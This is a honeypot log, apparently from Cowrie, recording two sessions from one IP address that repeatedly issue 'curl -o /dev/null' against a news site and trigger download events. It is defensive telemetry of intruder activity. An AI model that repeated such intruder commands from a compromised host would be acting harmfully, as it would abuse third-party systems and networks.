{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:42.822107Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:42.831404Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:42.832631Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:42.847097Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:42.872001Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:42.873602Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:42.878640Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:42.881274Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:42.882269Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:42.893264Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:42.894714Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:42.913663Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:42.917171Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:42.918328Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:42.936897Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:42.939102Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:42.941205Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:42.943230Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:42.978533Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:42.979894Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:42.983516Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:42.984649Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:43.010353Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:43.020218Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:43.021291Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:43.024590Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:43.025366Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:43.056956Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:43.058111Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:43.060207Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:43.063513Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:43.064675Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:43.095555Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:43.096606Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:43.099367Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:43.108587Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:43.109741Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:43.132247Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:43.133315Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:43.149467Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:43.150752Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:43.169845Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:43.170991Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:43.193464Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:43.194656Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:43.215626Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:43.216781Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:43.234867Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:43.236150Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:43.254870Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:43.256529Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:43.257694Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:43.278849Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:43.279990Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:43.295078Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:43.296376Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:43.300994Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:43.303331Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:43.333603Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:43.335675Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:43.337646Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:43.341516Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:43.343098Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:43.374226Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:43.377567Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:43.378804Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:43.384836Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:43.385651Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:43.419139Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:43.420489Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:43.424896Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:43.426082Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:43.454755Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:43.456283Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:43.461647Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:43.462811Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:43.465562Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:43.466575Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:43.469035Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:43.499482Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:43.500608Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:43.503217Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:43.507739Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:43.508651Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:43.539035Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:43.540350Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:43.544210Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:43.550509Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:43.551830Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:43.584075Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:43.585402Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:43.589306Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:43.618981Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:43.620481Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:43.660030Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:43.675322Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:43.677715Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:43.678934Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:43.700156Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:43.704639Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:43.705740Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:43.736231Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:43.737438Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:43.739244Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:43.742083Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:43.751591Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:43.752828Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:43.775504Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:43.776818Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:43.788588Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:43.789844Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:43.825312Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:43.826602Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:43.833211Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:43.834302Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:43.837016Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:43.852858Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:43.870018Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:43.871255Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:43.875306Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:43.878473Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:43.912777Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
